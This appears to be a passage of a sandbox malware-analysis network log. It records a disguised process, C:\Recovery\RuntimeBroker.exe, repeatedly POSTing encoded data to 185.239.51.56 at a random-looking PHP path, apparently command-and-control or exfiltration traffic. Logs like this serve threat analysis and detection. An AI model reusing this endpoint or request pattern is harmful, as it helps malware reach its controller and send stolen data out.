                                                                                                  Connection: Keep-Alive


                                                                                                  Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                                                                  40          192.168.2.4  49781        185.239.51.56   80                6340  C:\Recovery\RuntimeBroker.exe
                                                                                                  Timestamp                           Bytes transferred  Direction  Data
                                                                                                  Jan 1, 2025 02:27:42.821671009 CET  295                OUT        POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1
                                                                                                  Content-Type: application/octet-stream
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                  Host: 185.239.51.56
                                                                                                  Content-Length: 1600
                                                                                                  Expect: 100-continue
                                                                                                  Connection: Keep-Alive
                                                                                                  Jan 1, 2025 02:27:43.542999983 CET  25                 IN         HTTP/1.1 100 Continue
                                                                                                  Jan 1, 2025 02:27:43.552165031 CET  185                IN         HTTP/1.0 500 Internal Server Error
                                                                                                  Date: Wed, 01 Jan 2025 01:27:43 GMT
                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                  Content-Length: 0
                                                                                                  Connection: close
                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                  Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                                                                  41          192.168.2.4  49782        185.239.51.56   80                6340  C:\Recovery\RuntimeBroker.exe
                                                                                                  Timestamp                           Bytes transferred  Direction  Data
                                                                                                  Jan 1, 2025 02:27:42.943510056 CET  295                OUT        POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1
                                                                                                  Content-Type: application/octet-stream
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                  Host: 185.239.51.56
                                                                                                  Content-Length: 2504
                                                                                                  Expect: 100-continue
                                                                                                  Connection: Keep-Alive
                                                                                                  Jan 1, 2025 02:27:43.659171104 CET  25                 IN         HTTP/1.1 100 Continue
                                                                                                  Jan 1, 2025 02:27:43.796356916 CET  185                IN         HTTP/1.0 500 Internal Server Error
                                                                                                  Date: Wed, 01 Jan 2025 01:27:43 GMT
                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                  Content-Length: 0
                                                                                                  Connection: close
                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                  Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                                                                  42          192.168.2.4  49783        185.239.51.56   80                6340  C:\Recovery\RuntimeBroker.exe
                                                                                                  Timestamp                           Bytes transferred  Direction  Data
                                                                                                  Jan 1, 2025 02:27:43.930243969 CET  295                OUT        POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1
                                                                                                  Content-Type: application/octet-stream
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                  Host: 185.239.51.56
                                                                                                  Content-Length: 2504
                                                                                                  Expect: 100-continue
                                                                                                  Connection: Keep-Alive
                                                                                                  Jan 1, 2025 02:27:44.635761976 CET  25                 IN         HTTP/1.1 100 Continue
                                                                                                  Jan 1, 2025 02:27:44.660489082 CET  185                IN         HTTP/1.0 500 Internal Server Error
                                                                                                  Date: Wed, 01 Jan 2025 01:27:44 GMT
                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                  Content-Length: 0
                                                                                                  Connection: close
                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                  Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                                                                  43          192.168.2.4  49784        185.239.51.56   80                6340  C:\Recovery\RuntimeBroker.exe
                                                                                                  Timestamp                           Bytes transferred  Direction  Data
                                                                                                  Jan 1, 2025 02:27:44.802257061 CET  295                OUT        POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1
                                                                                                  Content-Type: application/octet-stream
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                  Host: 185.239.51.56
                                                                                                  Content-Length: 2504
                                                                                                  Expect: 100-continue
                                                                                                  Connection: Keep-Alive
                                                                                                  Jan 1, 2025 02:27:45.526875019 CET  25                 IN         HTTP/1.1 100 Continue
                                                                                                  Jan 1, 2025 02:27:45.535043001 CET  185                IN         HTTP/1.0 500 Internal Server Error
                                                                                                  Date: Wed, 01 Jan 2025 01:27:45 GMT
                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                  Content-Length: 0
                                                                                                  Connection: close
                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                  Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                                                                  44          192.168.2.4  49785        185.239.51.56   80                6340  C:\Recovery\RuntimeBroker.exe
                                                                                                  Timestamp                           Bytes transferred  Direction  Data
                                                                                                  Jan 1, 2025 02:27:45.661967993 CET  295                OUT        POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1
                                                                                                  Content-Type: application/octet-stream
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                  Host: 185.239.51.56
                                                                                                  Content-Length: 2500
                                                                                                  Expect: 100-continue
                                                                                                  Connection: Keep-Alive
                                                                                                  Jan 1, 2025 02:27:46.371860981 CET  25                 IN         HTTP/1.1 100 Continue
                                                                                                  Jan 1, 2025 02:27:46.380918026 CET  185                IN         HTTP/1.0 500 Internal Server Error
                                                                                                  Date: Wed, 01 Jan 2025 01:27:46 GMT
                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                  Content-Length: 0
                                                                                                  Connection: close
                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                  Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                                                                  45          192.168.2.4  49786        185.239.51.56   80                6340  C:\Recovery\RuntimeBroker.exe
                                                                                                  Timestamp                           Bytes transferred  Direction  Data
                                                                                                  Jan 1, 2025 02:27:46.502785921 CET  295                OUT        POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1
                                                                                                  Content-Type: application/octet-stream
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                  Host: 185.239.51.56
                                                                                                  Content-Length: 2504
                                                                                                  Expect: 100-continue
                                                                                                  Connection: Keep-Alive
                                                                                                  Jan 1, 2025 02:27:47.207947969 CET  25                 IN         HTTP/1.1 100 Continue
                                                                                                  Jan 1, 2025 02:27:47.217161894 CET  185                IN         HTTP/1.0 500 Internal Server Error
                                                                                                  Date: Wed, 01 Jan 2025 01:27:47 GMT
                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                  Content-Length: 0
                                                                                                  Connection: close
                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                  46 | 192.168.2.4 | 49787 | 185.239.51.56 | 80 | 6340 | C:\Recovery\RuntimeBroker.exe
                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                  Jan 1, 2025 02:27:47.348088980 CET | 295 | OUT | POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1
                                                                                                  Content-Type: application/octet-stream
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                  Host: 185.239.51.56
                                                                                                  Content-Length: 2500
                                                                                                  Expect: 100-continue
                                                                                                  Connection: Keep-Alive
                                                                                                  Jan 1, 2025 02:27:47.728812933 CET | 2500 | OUT | Data
                                                                                                  Jan 1, 2025 02:27:48.056498051 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                  Jan 1, 2025 02:27:48.064070940 CET | 185 | IN | HTTP/1.0 500 Internal Server Error
                                                                                                  Date: Wed, 01 Jan 2025 01:27:47 GMT
                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                  Content-Length: 0
                                                                                                  Connection: close
                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                  47 | 192.168.2.4 | 49788 | 185.239.51.56 | 80 | 6340 | C:\Recovery\RuntimeBroker.exe
                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                  Jan 1, 2025 02:27:48.219484091 CET | 295 | OUT | POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1
                                                                                                  Content-Type: application/octet-stream
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                  Host: 185.239.51.56
                                                                                                  Content-Length: 2504
                                                                                                  Expect: 100-continue
                                                                                                  Connection: Keep-Alive
                                                                                                  Jan 1, 2025 02:27:48.565774918 CET | 2504 | OUT | Data


                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                  48 | 192.168.2.4 | 49789 | 185.239.51.56 | 80 | 6340 | C:\Recovery\RuntimeBroker.exe
                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                  Jan 1, 2025 02:27:48.571702003 CET | 295 | OUT | POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1
                                                                                                  Content-Type: application/octet-stream
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                  Host: 185.239.51.56
                                                                                                  Content-Length: 1600
                                                                                                  Expect: 100-continue
                                                                                                  Connection: Keep-Alive
                                                                                                  Jan 1, 2025 02:27:48.925146103 CET | 1600 | OUT | Data
                                                                                                  Jan 1, 2025 02:27:49.272506952 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                  Jan 1, 2025 02:27:49.280401945 CET | 185 | IN | HTTP/1.0 500 Internal Server Error
                                                                                                  Date: Wed, 01 Jan 2025 01:27:49 GMT
                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                  Content-Length: 0
                                                                                                  Connection: close
                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                  49 | 192.168.2.4 | 49790 | 185.239.51.56 | 80 | 6340 | C:\Recovery\RuntimeBroker.exe
                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                  Jan 1, 2025 02:27:48.693653107 CET | 295 | OUT | POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1
                                                                                                  Content-Type: application/octet-stream
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                  Host: 185.239.51.56
                                                                                                  Content-Length: 2504
                                                                                                  Expect: 100-continue
                                                                                                  Connection: Keep-Alive
                                                                                                  Jan 1, 2025 02:27:49.050132036 CET | 2504 | OUT | Data
                                                                                                  Jan 1, 2025 02:27:49.413506031 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                  Jan 1, 2025 02:27:49.421489954 CET | 185 | IN | HTTP/1.0 500 Internal Server Error
                                                                                                  Date: Wed, 01 Jan 2025 01:27:49 GMT
                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                  Content-Length: 0
                                                                                                  Connection: close
                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                  50 | 192.168.2.4 | 49791 | 185.239.51.56 | 80 | 6340 | C:\Recovery\RuntimeBroker.exe
                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                  Jan 1, 2025 02:27:49.552170992 CET | 295 | OUT | POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1
                                                                                                  Content-Type: application/octet-stream
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                  Host: 185.239.51.56
                                                                                                  Content-Length: 2504
                                                                                                  Expect: 100-continue
                                                                                                  Connection: Keep-Alive
                                                                                                  Jan 1, 2025 02:27:49.909552097 CET | 2504 | OUT | Data
                                                                                                  Jan 1, 2025 02:27:50.253700018 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                  Jan 1, 2025 02:27:50.260987043 CET | 185 | IN | HTTP/1.0 500 Internal Server Error
                                                                                                  Date: Wed, 01 Jan 2025 01:27:50 GMT
                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                  Content-Length: 0
                                                                                                  Connection: close
                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                  51 | 192.168.2.4 | 49792 | 185.239.51.56 | 80 | 6340 | C:\Recovery\RuntimeBroker.exe
                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                  Jan 1, 2025 02:27:50.399451971 CET | 295 | OUT | POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1
                                                                                                  Content-Type: application/octet-stream
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                  Host: 185.239.51.56
                                                                                                  Content-Length: 2504
                                                                                                  Expect: 100-continue
                                                                                                  Connection: Keep-Alive
                                                                                                  Jan 1, 2025 02:27:50.758596897 CET | 2504 | OUT | Data
                                                                                                  Jan 1, 2025 02:27:51.101479053 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                  Jan 1, 2025 02:27:51.111953974 CET | 185 | IN | HTTP/1.0 500 Internal Server Error
                                                                                                  Date: Wed, 01 Jan 2025 01:27:50 GMT
                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                  Content-Length: 0
                                                                                                  Connection: close
                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                  52 | 192.168.2.4 | 49794 | 185.239.51.56 | 80 | 6340 | C:\Recovery\RuntimeBroker.exe
                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                  Jan 1, 2025 02:27:51.238217115 CET | 295 | OUT | POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1
                                                                                                  Content-Type: application/octet-stream
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                  Host: 185.239.51.56
                                                                                                  Content-Length: 2504
                                                                                                  Expect: 100-continue
                                                                                                  Connection: Keep-Alive
                                                                                                  Jan 1, 2025 02:27:51.597038984 CET | 2504 | OUT | Data
                                                                                                  Jan 1, 2025 02:27:51.939886093 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                  Jan 1, 2025 02:27:51.947170019 CET | 185 | IN | HTTP/1.0 500 Internal Server Error
                                                                                                  Date: Wed, 01 Jan 2025 01:27:51 GMT
                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                  Content-Length: 0
                                                                                                  Connection: close
                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                  53 | 192.168.2.4 | 49795 | 185.239.51.56 | 80 | 6340 | C:\Recovery\RuntimeBroker.exe
                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                  Jan 1, 2025 02:27:52.068526983 CET | 295 | OUT | POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1
                                                                                                  Content-Type: application/octet-stream
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                  Host: 185.239.51.56
                                                                                                  Content-Length: 2504
                                                                                                  Expect: 100-continue
                                                                                                  Connection: Keep-Alive
                                                                                                  Jan 1, 2025 02:27:52.425163984 CET | 2504 | OUT | Data
                                                                                                  Jan 1, 2025 02:27:52.779947042 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                  Jan 1, 2025 02:27:52.917870045 CET | 185 | IN | HTTP/1.0 500 Internal Server Error
                                                                                                  Date: Wed, 01 Jan 2025 01:27:52 GMT
                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                  Content-Length: 0
                                                                                                  Connection: close
                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                  54 | 192.168.2.4 | 49796 | 185.239.51.56 | 80 | 6340 | C:\Recovery\RuntimeBroker.exe
                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                  Jan 1, 2025 02:27:53.036608934 CET | 295 | OUT | POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1
                                                                                                  Content-Type: application/octet-stream
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                  Host: 185.239.51.56
                                                                                                  Content-Length: 2496
                                                                                                  Expect: 100-continue
                                                                                                  Connection: Keep-Alive
                                                                                                  Jan 1, 2025 02:27:53.394942999 CET | 2496 | OUT | Data
                                                                                                  Jan 1, 2025 02:27:53.747189999 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                  Jan 1, 2025 02:27:53.757153988 CET | 185 | IN | HTTP/1.0 500 Internal Server Error
                                                                                                  Date: Wed, 01 Jan 2025 01:27:53 GMT
                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                  Content-Length: 0
                                                                                                  Connection: close
                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                  55 | 192.168.2.4 | 49798 | 185.239.51.56 | 80 | 6340 | C:\Recovery\RuntimeBroker.exe
                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                  Jan 1, 2025 02:27:53.878933907 CET | 295 | OUT | POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1
                                                                                                  Content-Type: application/octet-stream
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                  Host: 185.239.51.56
                                                                                                  Content-Length: 2504
                                                                                                  Expect: 100-continue
                                                                                                  Connection: Keep-Alive
                                                                                                  Jan 1, 2025 02:27:54.237657070 CET | 2504 | OUT | Data


                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                  56 | 192.168.2.4 | 49799 | 185.239.51.56 | 80 | 6340 | C:\Recovery\RuntimeBroker.exe
                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                  Jan 1, 2025 02:27:54.290532112 CET | 295 | OUT | POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1
                                                                                                  Content-Type: application/octet-stream
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                  Host: 185.239.51.56
                                                                                                  Content-Length: 1600
                                                                                                  Expect: 100-continue
                                                                                                  Connection: Keep-Alive
                                                                                                  Jan 1, 2025 02:27:54.643901110 CET | 1600 | OUT | Data
                                                                                                  Jan 1, 2025 02:27:55.001338959 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                  Jan 1, 2025 02:27:55.174442053 CET | 185 | IN | HTTP/1.0 500 Internal Server Error
                                                                                                  Date: Wed, 01 Jan 2025 01:27:54 GMT
                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                  Content-Length: 0
                                                                                                  Connection: close
                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                  57 | 192.168.2.4 | 49800 | 185.239.51.56 | 80 | 6340 | C:\Recovery\RuntimeBroker.exe
                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                  Jan 1, 2025 02:27:54.409318924 CET | 295 | OUT | POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1
                                                                                                  Content-Type: application/octet-stream
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                  Host: 185.239.51.56
                                                                                                  Content-Length: 2504
                                                                                                  Expect: 100-continue
                                                                                                  Connection: Keep-Alive
                                                                                                  Jan 1, 2025 02:27:54.753259897 CET | 2504 | OUT | Data Raw: 53 5d 5e 52 5a 5b 5b 5d 5f 5a 5a 53 57 5d 56 56 5f 59 5d 41 51 50 57 5b 5e 5a 58 5f 5b 5b 55 5e 5d 5b 5f 5d 52 5f 57 53 5e 56 59 5d 5b 5c 54 5b 55 56 58 41 46 5e 51 58 57 5a 53 51 5e 5b 5b 54 5a 57 5d 42 57 45 51 52 58 59 5b 5d 5a 5f 5b 5c 5b 5b
                                                                                                  Data Ascii: S]^RZ[[]_ZZSW]VV_Y]AQPW[^ZX_[[U^][_]R_WS^VY][\T[UVXAF^QXWZSQ^[[TZW]BWEQRXY[]Z_[\[[TPT\\[U^Z_[ZVQQ_YRZX^ZX^\^_P^][WWQ[_PPXRX_PV]X^RZRS^^[Y^YRTC^SQ[Q@S_[]^[_\]\UWZ^CX_P\UX\V\XVVTCFX^\W]['<=5Z23(Z-="[=7.\<5C"Z#8#3$]1":"^%#[.6
                                                                                                  Jan 1, 2025 02:27:55.114847898 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                  Jan 1, 2025 02:27:55.173346043 CET | 185 | IN | HTTP/1.0 500 Internal Server Error
                                                                                                  Date: Wed, 01 Jan 2025 01:27:55 GMT
                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                  Content-Length: 0
                                                                                                  Connection: close
                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                  58 | 192.168.2.4 | 49806 | 185.239.51.56 | 80 | 6340 | C:\Recovery\RuntimeBroker.exe
                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                  Jan 1, 2025 02:27:55.302218914 CET | 295 | OUT | POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1
                                                                                                  Content-Type: application/octet-stream
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                  Host: 185.239.51.56
                                                                                                  Content-Length: 2504
                                                                                                  Expect: 100-continue
                                                                                                  Connection: Keep-Alive
                                                                                                  Jan 1, 2025 02:27:55.302258015 CET | 2504 | OUT | Data Raw: 56 5f 5e 57 5a 5c 5b 52 5f 5a 5a 53 57 58 56 5e 5f 5e 5d 42 51 56 57 58 5e 5a 58 5f 5b 5b 55 5e 5d 5b 5f 5d 52 5f 57 53 5e 56 59 5d 5b 5c 54 5b 55 56 58 41 46 5e 51 58 57 5a 53 51 5e 5b 5b 54 5a 57 5d 42 57 45 51 52 58 59 5b 5d 5a 5f 5b 5c 5b 5b
                                                                                                  Data Ascii: V_^WZ\[R_ZZSWXV^_^]BQVWX^ZX_[[U^][_]R_WS^VY][\T[UVXAF^QXWZSQ^[[TZW]BWEQRXY[]Z_[\[[TPT\\[U^Z_[ZVQQ_YRZX^ZX^\^_P^][WWQ[_PPXRX_PV]X^RZRS^^[Y^YRTC^SQ[Q@S_[]^[_\]\UWZ^CX_P\UX\V\XVVTCFX^\W][$+5!"2(Y86?'9(56X#;7Q';$_&7."^%#[."
                                                                                                  Jan 1, 2025 02:27:56.034147978 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                  Jan 1, 2025 02:27:56.045001984 CET | 185 | IN | HTTP/1.0 500 Internal Server Error
                                                                                                  Date: Wed, 01 Jan 2025 01:27:55 GMT
                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                  Content-Length: 0
                                                                                                  Connection: close
                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                  59 | 192.168.2.4 | 49812 | 185.239.51.56 | 80 | 6340 | C:\Recovery\RuntimeBroker.exe
                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                  Jan 1, 2025 02:27:56.314662933 CET | 295 | OUT | POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1
                                                                                                  Content-Type: application/octet-stream
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                  Host: 185.239.51.56
                                                                                                  Content-Length: 2504
                                                                                                  Expect: 100-continue
                                                                                                  Connection: Keep-Alive
                                                                                                  Jan 1, 2025 02:27:56.659555912 CET | 2504 | OUT | Data Raw: 53 59 5e 55 5f 58 5b 50 5f 5a 5a 53 57 58 56 52 5f 54 5d 49 51 53 57 5f 5e 5a 58 5f 5b 5b 55 5e 5d 5b 5f 5d 52 5f 57 53 5e 56 59 5d 5b 5c 54 5b 55 56 58 41 46 5e 51 58 57 5a 53 51 5e 5b 5b 54 5a 57 5d 42 57 45 51 52 58 59 5b 5d 5a 5f 5b 5c 5b 5b
                                                                                                  Data Ascii: SY^U_X[P_ZZSWXVR_T]IQSW_^ZX_[[U^][_]R_WS^VY][\T[UVXAF^QXWZSQ^[[TZW]BWEQRXY[]Z_[\[[TPT\\[U^Z_[ZVQQ_YRZX^ZX^\^_P^][WWQ[_PPXRX_PV]X^RZRS^^[Y^YRTC^SQ[Q@S_[]^[_\]\UWZ^CX_P\UX\V\XVVTCFX^\W][$+"6<X&',.<B9<1^6%!"(($8<[%2_:"^%#[."
                                                                                                  Jan 1, 2025 02:27:57.033912897 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                  Jan 1, 2025 02:27:57.041899920 CET | 185 | IN | HTTP/1.0 500 Internal Server Error
                                                                                                  Date: Wed, 01 Jan 2025 01:27:56 GMT
                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                  Content-Length: 0
                                                                                                  Connection: close
                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                  60 | 192.168.2.4 | 49818 | 185.239.51.56 | 80 | 6340 | C:\Recovery\RuntimeBroker.exe
                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                  Jan 1, 2025 02:27:57.160756111 CET | 295 | OUT | POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1
                                                                                                  Content-Type: application/octet-stream
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                  Host: 185.239.51.56
                                                                                                  Content-Length: 2504
                                                                                                  Expect: 100-continue
                                                                                                  Connection: Keep-Alive
                                                                                                  Jan 1, 2025 02:27:57.518896103 CET | 2504 | OUT | Data Raw: 53 5d 5e 5f 5f 58 5b 52 5f 5a 5a 53 57 58 56 5e 5f 5f 5d 48 51 52 57 58 5e 5a 58 5f 5b 5b 55 5e 5d 5b 5f 5d 52 5f 57 53 5e 56 59 5d 5b 5c 54 5b 55 56 58 41 46 5e 51 58 57 5a 53 51 5e 5b 5b 54 5a 57 5d 42 57 45 51 52 58 59 5b 5d 5a 5f 5b 5c 5b 5b
                                                                                                  Data Ascii: S]^__X[R_ZZSWXV^__]HQRWX^ZX_[[U^][_]R_WS^VY][\T[UVXAF^QXWZSQ^[[TZW]BWEQRXY[]Z_[\[[TPT\\[U^Z_[ZVQQ_YRZX^ZX^\^_P^][WWQ[_PPXRX_PV]X^RZRS^^[Y^YRTC^SQ[Q@S_[]^[_\]\UWZ^CX_P\UX\V\XVVTCFX^\W]['A<,"$[&0+8-<<!X!%1 ^/$8?%'=-"^%#[."
                                                                                                  Jan 1, 2025 02:27:57.863013029 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                  Jan 1, 2025 02:27:57.870934010 CET | 185 | IN | HTTP/1.0 500 Internal Server Error
                                                                                                  Date: Wed, 01 Jan 2025 01:27:57 GMT
                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                  Content-Length: 0
                                                                                                  Connection: close
                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                  61 | 192.168.2.4 | 49826 | 185.239.51.56 | 80 | 6340 | C:\Recovery\RuntimeBroker.exe
                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                  Jan 1, 2025 02:27:57.988245964 CET | 295 | OUT | POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1
                                                                                                  Content-Type: application/octet-stream
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                  Host: 185.239.51.56
                                                                                                  Content-Length: 2504
                                                                                                  Expect: 100-continue
                                                                                                  Connection: Keep-Alive
